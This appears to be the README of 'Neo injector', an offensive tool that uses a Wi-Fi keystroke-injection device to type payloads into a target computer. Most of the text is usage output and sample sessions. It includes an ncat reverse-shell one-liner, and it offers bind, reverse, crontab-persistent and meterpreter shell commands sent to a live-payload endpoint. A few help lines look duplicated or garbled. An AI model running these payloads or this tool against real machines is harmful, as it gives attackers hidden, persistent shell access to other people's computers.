Warning : Newest version of Neo Toolkit expect the Neo to have a firmware in the prefered language, alternatively you can force the french keyboard with the english firmware using the --force
arguments. For more customization informations go to swisskyrepo.github.io .
Where to buy a Neo injector ? I got mine from Aliexpress
python3 injector.py -v --host 127.0.0.1 --port 4242 --payload payloads / windows.txt -h
usage: injector.py [-h] [-v] [--host [HOST]] [--port [PORT]]
[--user [USER]] [--pass [PASS]] [--panel [PANEL]]
[--payload [PAYLOAD]]
optional arguments:
-h, --help show this help message and exit
-v Verbosity of the output
--host [HOST] Host reverse-shell
--port [PORT] Port reverse-shell
--user [USER] Wifi Panel username
--pass [PASS] Wifi Panel password
--panel [PANEL] Wifi Panel password
--payload [PAYLOAD] Payload template
Targeting a Windows OS
python3 injector.py -v --host 127.0.0.1 --port 4242 --payload payloads/windows.txt
Send a simple reverse-shell payload
$ python3 injector.py -v --host 127.0.0.1 --port 4444
-------------------------------------------------------------
Neo injector - You need to be connected to the Exploit AP
-------------------------------------------------------------
__ °
<(o )___
( ._> /
`---' @pxcs
Enter a payload, eg: bash -c 'nohup ncat 127.0.0.1 4242 -e $SHELL &'
-------------------------------------------------------------------
>>> reverse
Payload:
Rem:Default Payload
Press:130+195
CustomDelay:1000
Print: bash SHELL:14
CustomDelay:1000
Press:176
Sending payload to http://192.168.1.1/runlivepayload
Commands | Description |
---|---|
bind | initiate a bind shell on results.port |
reverse | initiate a reverse shell on results.host and results.port |
crontab | set up a crontab reverse shell on results.host and results.port |
meterpreter | use exploit script / web delivery with a posh-payload |
send some text | send the specified text |
h | help |
q | quit |
You can change the options with SET option_name option_value
>>> set host 127.0.0.1
>>> set port 4444
Thanks to:
- swisskyrepo
- metasploit
- pxcs